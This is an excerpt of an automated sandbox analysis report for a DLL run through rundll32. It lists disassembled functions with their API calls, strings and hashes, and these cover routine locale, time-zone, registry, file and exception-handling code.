TranslateName.LIBCMT ref: 00007FFDFA99DC20
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FFDFA991164), ref: 00007FFDFA99DC65
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FFDFA991164), ref: 00007FFDFA99DC8D
wcschr.LIBVCRUNTIME ref: 00007FFDFA99DD29
wcschr.LIBVCRUNTIME ref: 00007FFDFA99DD39

Strings

utf8, xrefs: 00007FFDFA99DD71

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorLastNameTranslatewcschr$CodePageValid
String ID: utf8
API String ID: 4034593509-905460609
Opcode ID: 9037524b7887c54ef7435bac6bec97f6d457a13c37b20ddcf57d1d6be663a1af
Instruction ID: b25bbac902f0432bc6141e83dc451327999860ccd2ba74fc97dcce88768c3426
Opcode Fuzzy Hash: 9037524b7887c54ef7435bac6bec97f6d457a13c37b20ddcf57d1d6be663a1af
Instruction Fuzzy Hash: AD919032B0874291FB689F21D4A1AB923A4EF98B88F845171DA6D877CDEF7CE551C340

Function 00007FFDFA994A20 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 329timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FFDFA994A5B

Part of subcall function 00007FFDFA9944A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA9944B8

_get_daylight.LIBCMT ref: 00007FFDFA994A4A

Part of subcall function 00007FFDFA994504: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA994518

_get_daylight.LIBCMT ref: 00007FFDFA994C4B
_get_daylight.LIBCMT ref: 00007FFDFA994C5C
_get_daylight.LIBCMT ref: 00007FFDFA994C6D
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FFDFA994EA1), ref: 00007FFDFA994C94

Strings

?, xrefs: 00007FFDFA994D66

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
String ID: ?
API String ID: 435049134-1684325040
Opcode ID: 91f219648b7238c1d8e409ccb1902a6cf5bc3807cc9d2c9591cda69f8f3636b5
Instruction ID: bc70ca1a697f1b3edc13e7dc9b4057f541ee9a65e6e2d4e8aef02b1e8a9bcd6f
Opcode Fuzzy Hash: 91f219648b7238c1d8e409ccb1902a6cf5bc3807cc9d2c9591cda69f8f3636b5
Instruction Fuzzy Hash: C2D1E536B082425AE7699F25D860AB93B94FB8879CFC441B1EA2D876DDDF3CE441C740

Function 00007FFDFA8B69A0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 246COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

Part of subcall function 00007FFDFA8B60EC: std::current_exception.LIBCMT ref: 00007FFDFA8B6119

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FFDFA8B6D16

Part of subcall function 00007FFDFA94CA10: std::ios_base::_Tidy.LIBCPMT ref: 00007FFDFA94CA35

Part of subcall function 00007FFDFA8BE0A4: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BE0FC

Part of subcall function 00007FFDFA8BE194: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BE1F0

Strings

file, xrefs: 00007FFDFA8B6BEE, 00007FFDFA8B6BFD
line, xrefs: 00007FFDFA8B6C42, 00007FFDFA8B6C51
timestamp, xrefs: 00007FFDFA8B6A69, 00007FFDFA8B6A78
origin, xrefs: 00007FFDFA8B6B54, 00007FFDFA8B6B63
msg, xrefs: 00007FFDFA8B6AD9, 00007FFDFA8B6AE8
function, xrefs: 00007FFDFA8B6BA1, 00007FFDFA8B6BB0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocatestd::_$std::ios_base::_$Ios_base_dtorTidystd::current_exception
String ID: file$function$line$msg$origin$timestamp
API String ID: 3875769080-4102175642
Opcode ID: 461f2c2ad81ed990861590079a5a549b510804d5c2a481b745797e54b5d529a6
Instruction ID: ef130c2b1f1bd13c3e86bc94938a2aa8125489415aeaf35a4d775bbf3c334be9
Opcode Fuzzy Hash: 461f2c2ad81ed990861590079a5a549b510804d5c2a481b745797e54b5d529a6
Instruction Fuzzy Hash: C7B16022734A929ADB64EF24DC619ED2364FF51388F802132EA2D97ADDDF79D548C340

Function 00007FFDFA8B70EC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 189registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8B3FD4: RegQueryValueExW.ADVAPI32 ref: 00007FFDFA8B4029

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

RegQueryValueExW.ADVAPI32 ref: 00007FFDFA8B7371

Part of subcall function 00007FFDFA8B73C4: CreateFileW.KERNEL32 ref: 00007FFDFA8B74C7
Part of subcall function 00007FFDFA8B73C4: new.LIBCMT ref: 00007FFDFA8B74DC
Part of subcall function 00007FFDFA8B73C4: CloseHandle.KERNEL32 ref: 00007FFDFA8B751E

Strings

WriteThrough, xrefs: 00007FFDFA8B7321, 00007FFDFA8B7330
MaxFileSize, xrefs: 00007FFDFA8B72D0, 00007FFDFA8B72DF
MaxFileCount, xrefs: 00007FFDFA8B7286, 00007FFDFA8B7295
PathPrefix, xrefs: 00007FFDFA8B716E, 00007FFDFA8B717D
AppendProcessNameToPathPrefix, xrefs: 00007FFDFA8B71F0, 00007FFDFA8B71FF

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: QueryValue$CloseCreateDeallocateFileHandlestd::_
String ID: AppendProcessNameToPathPrefix$MaxFileCount$MaxFileSize$PathPrefix$WriteThrough
API String ID: 634952362-2621746944
Opcode ID: 4decc1ef81a76709185ad96e1a7e39947b39d8f0209d5821278beaa937307f06
Instruction ID: 22a674ae88642819b8dd9abe842392bab9f87d64d9621c699a401e918e8b208f
Opcode Fuzzy Hash: 4decc1ef81a76709185ad96e1a7e39947b39d8f0209d5821278beaa937307f06
Instruction Fuzzy Hash: 75818F22B24B429AFB14DB60D8619EC2375FB417C8BC06572DE2D57AE9DF79E105C380

Function 00007FFDFA99E5B4 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFDFA990624: GetLastError.KERNEL32(?,?,?,00007FFDFA978F8B,?,?,00000000,00007FFDFA983470), ref: 00007FFDFA990633
Part of subcall function 00007FFDFA990624: SetLastError.KERNEL32(?,?,?,00007FFDFA978F8B,?,?,00000000,00007FFDFA983470), ref: 00007FFDFA9906D1

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FFDFA99115D), ref: 00007FFDFA99E70B
GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FFDFA99E724
ProcessCodePage.LIBCMT ref: 00007FFDFA99E74E
IsValidCodePage.KERNEL32 ref: 00007FFDFA99E760
IsValidLocale.KERNEL32 ref: 00007FFDFA99E776
GetLocaleInfoW.KERNEL32 ref: 00007FFDFA99E7D2
GetLocaleInfoW.KERNEL32 ref: 00007FFDFA99E7EE

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 3939093798-0
Opcode ID: 25b52fd1a061e6757f5fc0426163982217b8d191a945646d4494831f290e7d3c
Instruction ID: a10ba8b60afdc8d862ab098a7564bb670c1cafaf969b4d3313cf8964e5d80e7a
Opcode Fuzzy Hash: 25b52fd1a061e6757f5fc0426163982217b8d191a945646d4494831f290e7d3c
Instruction Fuzzy Hash: F3719032F14742A9FF599B61D4A0ABC23A0BF48748F844075CA2D976D9EF3CE885C351

Function 00007FFDFA8AEDE0 Relevance: 9.3, APIs: 6, Instructions: 341stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00007FFDFA8AFEFA,?,?,00000000,?,00007FFDFA8AF9FF,?,00000000), ref: 00007FFDFA8AEF32

Part of subcall function 00007FFDFA946700: EnterCriticalSection.KERNEL32 ref: 00007FFDFA946710

_Init_thread_footer.LIBCMT ref: 00007FFDFA8AEF01

Part of subcall function 00007FFDFA9466A0: EnterCriticalSection.KERNEL32 ref: 00007FFDFA9466B0
Part of subcall function 00007FFDFA9466A0: LeaveCriticalSection.KERNEL32 ref: 00007FFDFA9466F0

Part of subcall function 00007FFDFA8AE0A4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8AE0C0
Part of subcall function 00007FFDFA8AE0A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA8AE13B

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$ExceptionInit_thread_footerLeaveThrow_invalid_parameter_noinfolstrcmpi
String ID:
API String ID: 2723823283-0
Opcode ID: d01254014a0888735ac677331e3c095b2be14ecc9ab81719c8962e67222e810e
Instruction ID: ed0733da3914437050352b099b5a337e8bd2ae8e6550992993c1ae60a3575012
Opcode Fuzzy Hash: d01254014a0888735ac677331e3c095b2be14ecc9ab81719c8962e67222e810e
Instruction Fuzzy Hash: 02E1C632B2CA8295E7689B14E460BB97361FB84790F904171DAAD4BBDCDF7CE845C720

Function 00007FFDFA8B7680 Relevance: 9.3, APIs: 6, Instructions: 277fileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32 ref: 00007FFDFA8B76CF
CloseHandle.KERNEL32 ref: 00007FFDFA8B76EF
CreateFileW.KERNEL32 ref: 00007FFDFA8B7740
GetFileSizeEx.KERNEL32 ref: 00007FFDFA8B7760
CloseHandle.KERNEL32 ref: 00007FFDFA8B7780

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

Part of subcall function 00007FFDFA96C670: GetFileAttributesW.KERNEL32 ref: 00007FFDFA96C6B7

CreateFileW.KERNEL32 ref: 00007FFDFA8B7A15

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: File$CloseCreateHandleSize$AttributesDeallocatestd::_
String ID:
API String ID: 2266459488-0
Opcode ID: 44d6dd8011be339173400ccdf1f0c6f5fe9cb07d33a31f72547726f31f158f42
Instruction ID: 6328ac7219c6c4dfe954b860e68f842561d19246c836900ec67e19de7febf992
Opcode Fuzzy Hash: 44d6dd8011be339173400ccdf1f0c6f5fe9cb07d33a31f72547726f31f158f42
Instruction Fuzzy Hash: A4B1E332725A4286E724DB24D8A09AE3371FB513C4F902132EB6D93EE9DF79E545CB40

Function 00007FFDFA9801A4 Relevance: 9.2, APIs: 6, Instructions: 245COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA9801C6
_get_daylight.LIBCMT ref: 00007FFDFA980222
_get_daylight.LIBCMT ref: 00007FFDFA980233
_get_daylight.LIBCMT ref: 00007FFDFA980244
_isindst.LIBCMT ref: 00007FFDFA980295
_isindst.LIBCMT ref: 00007FFDFA9802E8

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: 41879574f6c20fab66deb2fe597a2458ac09b0a7f20eef7f0bdc6a2b12ed0ac5
Instruction ID: 5f639e27356aa79cf276989f62348136d19566541244472ea990e85b5fe77d55
Opcode Fuzzy Hash: 41879574f6c20fab66deb2fe597a2458ac09b0a7f20eef7f0bdc6a2b12ed0ac5
Instruction Fuzzy Hash: A591B2B2B042464BEB5C8F69C961AB82391EB48B88F848135DA1DCF7CDEF3CE5508700

Function 00007FFDFA97CFD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFDFA97D051
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDFA97D069
RtlVirtualUnwind.KERNEL32 ref: 00007FFDFA97D0A4
IsDebuggerPresent.KERNEL32 ref: 00007FFDFA97D0DD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDFA97D0E7
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDFA97D0F2

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 7a8e782dcfe3c76f70ce5210072e5310648d50e5df58fb2ab3501447c95856a4
Instruction ID: 4caf472d766fe094e3371815f76b97975fada81952c9a5ed56e23ecc0a8625da
Opcode Fuzzy Hash: 7a8e782dcfe3c76f70ce5210072e5310648d50e5df58fb2ab3501447c95856a4
Instruction Fuzzy Hash: C4318136708B8286DB64CF25E8506AE73A0FB88754F900275EEAD83B98DF3CD545CB00

Function 00007FFDFA906E84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA90ABD0: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFA906EB3), ref: 00007FFDFA90AC8B
Part of subcall function 00007FFDFA90ABD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFA906EB3), ref: 00007FFDFA90ACCF

RegOpenKeyExW.ADVAPI32 ref: 00007FFDFA906EFA
RegQueryValueExW.ADVAPI32 ref: 00007FFDFA906F26
RegCloseKey.ADVAPI32 ref: 00007FFDFA906F31

Part of subcall function 00007FFDFA907010: FindResourceExW.KERNEL32 ref: 00007FFDFA9070A9

Part of subcall function 00007FFDFA97903C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA979059

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FFDFA906EEC
ProductName, xrefs: 00007FFDFA906F1A

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CloseQueryValue$FindOpenResource_invalid_parameter_noinfo
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3908126574-1787575317
Opcode ID: 7aba093e82558c0a383d5235584f72a899d5e70cf348b51c6e482f55d882f7d1
Instruction ID: 701720b240d97fec33a06d43e000631ecd29aa179f2f328257f8eff5a34d247f
Opcode Fuzzy Hash: 7aba093e82558c0a383d5235584f72a899d5e70cf348b51c6e482f55d882f7d1
Instruction Fuzzy Hash: 0731C636B18A5281EB589B25F465A6A6360FF857A0F805571EABD837EDDF3CD044CB00

Function 00007FFDFA998330 Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 00007FFDFA99839F
WriteFile.KERNEL32 ref: 00007FFDFA998649
WriteFile.KERNEL32 ref: 00007FFDFA99869B
GetLastError.KERNEL32 ref: 00007FFDFA9987DD
GetLastError.KERNEL32 ref: 00007FFDFA9987EF

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorFileLastWrite$Console
String ID:
API String ID: 786612050-0
Opcode ID: cf65ff2881ab8c12cedd7510b17b31640be7f109ecaff84084c444286e9540d5
Instruction ID: a7e333a0fe5f0944ba90cf29bfb8e3956008d7a14971042775830954dcf5dcd3
Opcode Fuzzy Hash: cf65ff2881ab8c12cedd7510b17b31640be7f109ecaff84084c444286e9540d5
Instruction Fuzzy Hash: 1AD10332B18B81AAE704CF64D4545AD77B1FB4878CB94817ACE6E87BD9DE38E016C700

Function 00007FFDFA8D530C Relevance: 7.8, APIs: 5, Instructions: 312COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8D543E

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8D545E
new.LIBCMT ref: 00007FFDFA8D5467
new.LIBCMT ref: 00007FFDFA8D547A
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8D55D2

Memory Dump Source

